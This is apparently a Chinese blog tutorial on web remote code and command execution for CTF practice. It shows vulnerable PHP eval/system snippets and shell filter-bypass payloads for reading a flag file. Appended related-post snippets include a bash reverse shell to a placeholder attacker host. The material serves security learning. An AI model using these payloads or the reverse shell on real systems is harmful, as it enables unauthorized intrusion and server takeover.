WEB攻防-RCE代码&命令执行&过滤绕过&异或无字符&无回显方案&黑白盒挖掘

最新推荐文章于 2025-04-17 11:40:03 发布
最新推荐文章于 2025-04-17 11:40:03 发布
阅读量912 收藏 12
点赞数 7
文章标签: 网络安全 RCE执行漏洞 RCE绕过
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45534587/article/details/145528633
版权

目录

一、什么是 RCE

二、命令执行和代码执行

三、常见的代码/命令执行函数

3.1  PHP

3.2  Python

3.3  Java

四、RCE利用&绕过&异或&回显

4.1  关键字过滤(flag)绕过方法

 4.1.1  通配符绕过

4.1.2  转义符号绕过

4.1.3   空变量插入绕过

4.1.4  分号拼接变量

4.1.5  反引号命令替换

4.1.6  编码绕过技巧

4.4.7  组合绕过(文件创建+命令重组)

4.7.8  异或无符号(过滤0-9a-zA-Z)

4.7.9  过滤函数关键字绕过

1. 内联执行绕过

2. 替代命令读取文件 

3. 报错泄露内容

4.7.10  过滤空格绕过

1. URL编码绕过

2. 变量替换

3. 大括号扩展

 4.1.12  无回显利用

1. 写文件后访问

2. 对外请求泄露数据

 五、CTFSHOW题目(部分)

5.1  WEB入门第29题

5.2  WEB入门第30题

5.3  WEB入门第31题

5.4  WEB入门第32题

5.5  WEB入门第33题

5.6  WEB入门第34题

5.7  WEB入门第35题

5.8  WEB入门第36题

5.9  WEB入门第37题

5.10  WEB入门第38题

5.11  WEB入门第39题

一、什么是 RCE

RCE,全称 Remote Code Execution,也就是远程代码执行。简单来说,它是一种非常危险的安全漏洞。正常情况下,我们访问一个网站或者使用某个应用程序,只能按照开发者设定好的功能来操作。但要是存在 RCE 漏洞,攻击者就能打破这种限制,在目标服务器上执行他们自己编写的代码。

二、命令执行和代码执行

命令执行和代码执行都是 RCE 漏洞的表现形式。代码执行和命令执行有点像,但又不完全一样。命令执行主要是执行操作系统的命令,而代码执行则是可以执行各种编程语言编写的代码。

通过简单的案例描述两者区别,假设如下代码,接受一个参数c,没任何的过滤,且使用代码执行函数执行接收的参数c,只要控制参数c传入恶意代码,就产生了代码执行的漏洞

<?php
$code = $_GET['c'];
eval($code);

 同样的假设如下代码,接受一个参数c,没任何的过滤,且使用命令执行函数执行接收的参数c,只要控制参数c传入恶意代码,就产生了代码执行的漏洞

<?php
$cmd = $_GET['c'];
system($cmd);

 命令执行和代码执行是可以相互利用的,即执行命令去执行代码,执行代码去执行命令都是可以的

在命令行通过php环境变量执行代码

回到 第一个小例子,可以通过代码执行去操作cmd,其实想后门文件经常看到就是这种eval的命令执行后门

<?php
$code = $_GET['c'];
eval($code);

 c参数传如命令执行的代码system

三、常见的代码/命令执行函数


3.1  PHP

PHP代码执行函数:

eval()、assert()、preg_replace()、create_function()、array_map()、call_user_func()、call_user_func_array()、array_filter()、uasort()、等

PHP命令执行函数:

system()、exec()、shell_exec()、pcntl_exec()、popen()、proc_popen()、passthru()、等

3.2  Python

eval exec subprocess os.system commands

3.3  Java

Runtime.exec()方法,ProcessBuilder

还有反射机制,并且有各种基于反射机制的表达式引擎,如: OGNL、SpEL、MVEL等.

四、RCE利用&绕过&异或&回显

4.1  关键字过滤(flag)绕过方法

 4.1.1  通配符绕过

通配符可以匹配一个或多个字符,借此绕过关键字过滤。

cat fl*       # 匹配以 "fl" 开头的文件(如 flag、fl.txt)
cat ?la*      # "?" 匹配单个字符(如 f?ag → flag)

  • Shell通配符规则

    • *:匹配任意长度字符串(包括空)。

    • ?:匹配单个字符。

  • 适用场景
    已知文件名前缀(如 fl),但不确定完整名称时。
    字符过滤,如过滤flag 

4.1.2  转义符号绕过

利用转义符号让系统将敏感关键字的部分字符当作普通字符处理,从而绕过过滤。

ca\t /fl\ag    # 实际执行 cat /flag

Shell解析机制

  • 反斜杠 \ 在Shell中有两种作用:

    1. 转义特殊字符:如 \$ 转义为 $\ 转义空格。

    2. 普通字符:若 \ 后跟随非特殊字符(如 ta),则 \ 被直接忽略。

  • 验证命令

echo ca\t /fl\ag    # 输出:cat /flag

关键细节

  • \t 的误解
    在Shell命令行中,\t 不会被解析为Tab字符(除非使用 echo -e 或编程语言处理)。
    例如:

    echo -e "ca\t /fl\ag"   # 输出:ca      /flag(含Tab)

    路径中的 /
    / 是路径分隔符,不会被转义。若命令中写成 /fl\ag,实际路径仍为 /flag\ 被忽略)。

cat fl''ag         # 单引号拼接(fl''ag → flag)
  • fl''ag 被Shell解析为 flag(单引号内无操作)。

4.1.3   空变量插入绕过

ca$*t fl$*ag    # 等价于 cat flag($* 为空)
ca$@t f${x}lag  # 等价于 cat flag($@ 或 ${x} 为空)

  • 变量替换规则

    • $*$@ 表示所有位置参数,若未定义则为空。

    • ${x} 表示变量 x 的值,若未定义则为空。

  • 绕过逻辑
    通过插入空变量将敏感关键字(如 cat)拆分为 ca + t,绕过正则检测(如 /\bcat\b/)。

4.1.4  分号拼接变量

a=fl;b=ag;cat$IFS$a$b   # 实际执行 cat flag

  • 关键点

    • $IFS:Shell内部字段分隔符,默认为空格(可绕过空格过滤)。

    • 分号 ; 分隔多个命令,$a$b 拼接为 flag

  • 变体

    a=c;b=at;c=fl;d=ag;$a$b $IFS$c$d  # 执行 cat flag
最低0.47元/天 解锁文章
RCE远程命令/代码执行漏洞绕过
G3et的博客
01-01 1164
(1)RCE主要是执行了危险的函数(3)常见的绕过:空格过滤、命令分隔符、编码绕过、Hex编码绕过、Oct编码绕过、变量绕过、反斜杠绕过、偶读拼接绕过关键字过滤等 (4)熟悉掌握php中远程命令/代码执行的相关函数以及绕过和原理参考文档:远程命令/代码执行漏洞RCE)总结RCE远程命令执行绕过初学RCE(远程命令/代码执行漏洞
网络安全零基础入门必知必会】之PHP远程命令执行代码执行原理利用与常见绕过总结3
Libra1313的博客
07-22 763
相较于SQL注入漏洞,远程命令执行更加少见。由于是直接执行系统命令,所以相较于前者此漏洞会更加危险:攻击者通过远程命令执行漏洞可以直接掌控服务器攻击者可以通过存在此漏洞的服务器作为跳板,进而攻击内网或外网中的其他服务器。
HITCON 2017 babyfirst-revenge(命令执行绕过一)
郁离歌丶的博客
04-28 2894
院科协换届...10点才去大活打开电脑...修炼第一天怕是只能看个题了....题目链接:https://github.com/otakekumi/CTF-Challenge/blob/master/PHP/chall_1/Chall_1.md审计了一下,大概就是考linux命令执行绕过,命令长度限制了。直接对着代码想了好久,无果。梅子酒说先搭起环境来,再慢慢搞。WEB学习第一步:搭环境,改bug...
CTF命令执行RCE)常用命令及绕过姿势
最新发布
Splendor03的博客
04-17 221
RCE(Remote Code Execution)有许许多多可以绕过的姿势,在这总结一下。
Day58:WEB攻防-RCE代码&命令执行&过滤绕过&异或字符&无回显方案&黑白挖掘
qq_61553520的博客
03-30 2217
小迪安全-Day58:WEB攻防-RCE代码&命令执行&过滤绕过&异或字符&无回显方案&黑白挖掘
CTF——远程代码执行漏洞的利用与绕过
weixin_51735061的博客
03-10 4768
CTF——远程代码执行漏洞的利用与绕过 RCE远程代码执行是一种常见的攻击方法,通过一些特定的函数方法来达到远程执行漏洞。比如说PHP的system,exec,shell_exec,nodejs的eval等。开发者不小心将这些函数公开出来以实现某种服务,而用户的数据不施加任何的过滤的话就很容易形成此漏洞。 敏感函数 系统指令执行的敏感函数 system()、exec()、shell_exec()、passthru()、pctnl_exec()、 popen()、proc_open() 能够进行代码注入的敏
命令执行RCE及其绕过详细总结(各情景下的绕过
热门推荐
2301_76690905的博客
12-12 1万+
scandir() :将返回当前目录中的所有文件和目录的列表。返回的结果是一个数组,其中包含当前目录下的所有文件和目录名称(glob()可替换)localeconv() :返回一包含本地数字及货币格式信息的数组。(但是这里数组第一项就是‘.’,这个.的用处很大)current() :返回数组中的单元,默认取第一个值。pos()和current()是同一个东西getcwd() :取得当前工作目录dirname():函数返回路径中的目录部分。
PHP远程命令执行代码执行原理利用与常见绕过总结
m0_74220316的博客
03-31 2396
相较于SQL注入漏洞,远程命令执行更加少见。
PHP代码命令执行绕过
qq_46001025的博客
10-15 1006
NaN(Not a Number,非数)是计算机科学中数值数据类型的一类值,表示未定义或不可表示的值。常在浮点数运算中使用。Linux下支持glob通配符代替 . 或者叫 period,它的作用和source一样,就是用当前的shell执行一个文件中的命令,例如 .file 就是执行file文件中的命令。数组(Array)的第一个字母是A,在php中,如果强制连接数组和字符串的话,数组会转换成字符串,值为Array;sh a-------------------sh会把 a 里面的每行内容当命令来执行
无数字字母rce总结(取反、异或、自增)
qq_45392044的博客
02-24 972
成功获取到了字符Array,然后我们获取想获取A的话,就可以采用[0]这种方式来获取,但我们是不能够写数字的,所以我们这里可以用一个判断,比如我们在[]里加一个==,此时因为空和不同,它就会输出0,此时也就等同于_[0],具体实现代码如下。我们在构造POST中的时,正常操作的话是这样,a='_'.b(假设这里b就是POST),然后这个时候如果'被ban,看似这里是无法再利用了,但其实,我们直接写a=.b也是可以的,这个时候效果同上而且缩短了字符长度。什么是异或,我们这里举一个例子,我们将字符 A。
异或脚本rce题目绕过正则表达式必备
12-28
字符串转换成异或型,用于rce绕过正则表达式
网安入门21——RCE绕过方法梳理)
m0_61499194的博客
10-04 609
所以前面的“IFS”可以改为 “$IFS$9”。less:和more类似,但其优点可以往前翻页,而且进行可以搜索字符。9表示当前系统shell进程的第九个参数,通常是一个空字符。tac:从最后一行倒序显示内容,并将所有内容输出。cat:由第一行开始显示内容,并将所有内容输出。more:根据窗口大小,一页一页的现实文件内容。是Linux存在的环境变量,是内部字段分隔符。反引号可以将ls列出的内容全部cat输出一遍。nl:类似于cat -n,显示时输出行号。目标是获取flag.txt的内容。
无字母数字rce总结(自增、取反、异或、或、临时文件上传)
whale_waves的博客
02-29 2902
临时文件上传 通过上传文件然后用符号.调用执行文件 第一个知识点: 通过post上传文件,此时php会在linux里的零时文件夹保存文件,且文件一定是php加上六个随机的字符 /tmp/php?????? 这个应php保存的临时文件会有一个特性,就是这6个随机的字符会出现大写的情况 例如: 普通文件/tmp/adcabcabc php保存的临时文件/tmp/phpAvxAsa 第二个知识点: 现在直到了文件上传的位置以及特性那么现在要怎么利用它 shell下支持使用. 来
RCE(命令执行)总结
leekos的博客,分享web安全相关知识~
01-05 3093
RCE(命令执行)总结
RCE代码命令执行(详解)
剁椒鱼头没剁椒的博客
12-20 5419
借鉴链接:https://www.cnblogs.com/networkroom/p/16395024.html当然还有很多的其他函数,可以自学百度搜索。在low级别中是接受了用户输入的IP,服务器通过操作性的不同情况执行ping命令,并且Low级别中并未对输入的内容进行过滤。在Medium级别中是对“&&”与“;”进行了过滤,那么这里可以不使用这两个破解符即可,使用别的,比如我之前提到的“|”或者“&”。在High级别中是对“| ”进行过滤了,这里不知道是作者无意间敲了一个空格还是故意的。
RCE——命令执行
m0_73756016的博客
02-21 1122
和星号(*)用来模糊搜索文件?将前面的命令的输出作为后面命令的输入,把前面命令的结果当成后面命令的参数,前面的命令和后面的命令都会执行,但只显示后面的命令执行结果。shell_exec(): 执行shell命令并返回输出的结果的字符串,回显需要echo。若前面的命令执行成功,则后面的命令就不会执行,若前面的命令执行失败,则执行后面的命令。"<"表示的是输入重定向的意思,就是把<后面跟的文件取代键盘作为新的输入设备。exec(): 执行一个外部的应用程序,以数组形式保存结果,回显需要echo。
pikachu靶场 :五、RCE
qq_43233085的博客
01-31 1400
pikachu靶场 :五、RCE 概述远程系统命令执行远程代码执行exec "ping"exec "eval" 概述 RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口 比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操...
RCE远程代码执行
q
06-18 926
RCE代码执行:引用脚本代码解析执行RCE命令执行:脚本调用操作系统命令。
命令执行漏洞绕过过滤
04-08
### 命令执行漏洞的安全过滤机制绕过方法 在讨论如何绕过命令执行漏洞的安全过滤机制之前,需了解其基本原理。命令执行漏洞通常涉及 Web 应用程序调用了能够执行系统命令的函数[^4],例如 `system()` 或 `exec()` 等。为了防止此类漏洞被利用,许多安全防护设备会尝试识别并阻止潜在危险的操作。 #### 绕过的常见方式 以下是几种可能用于绕过命令执行漏洞过滤的技术: 1. **编码转换** 攻击者可以通过对输入数据进行编码来规避简单的字符串匹配规则。例如,将明文命令替换为其十六进制表示形式,并通过解码函数将其还原为可执行命令[^3]。 ```php &lt;?php echo system(hex2bin($_POST[&quot;command&quot;])); ?&gt; ``` 2. **分段注入** 将完整的恶意指令拆分为多个部分,在运行时重新组合成最终的有效负载。这种方法可以避开基于固定模式签名的检测引擎。 3. **替代字符集** 使用不同的字符集或转义序列表达相同含义的内容也可能帮助突破某些防御层。比如采用 Unicode 编码或其他国际化支持下的特殊符号代替标准 ASCII 字符串。 4. **逻辑混淆** 利用条件语句或者循环结构增加脚本复杂度,使得静态分析难以判断实际行为路径。 5. **动态生成payloads** 创建自定义算法实时生产变种版本的 exploit payloads ,从而减少重复性和提高不可预测性。 需要注意的是,尽管存在这些技巧可以帮助研究者测试系统的健壮程度,但在真实环境中实施任何非法活动均属违法行为,应严格遵守法律法规及道德准则。 ```bash # 示例:使用base64加密后的反弹shell payload bash -c &#39;exec bash -i &amp;&gt;/dev/tcp/attacker_ip/attacker_port &lt;&amp;1&#39; ``` 此代码片段展示了如何构建一个经过简单 base64 加密处理之后再解密执行的基础 Bash 反弹 Shell Payload 。它隐藏了原始意图直到被执行那一刻才会显现出来。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

癞皮狗不赖皮

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值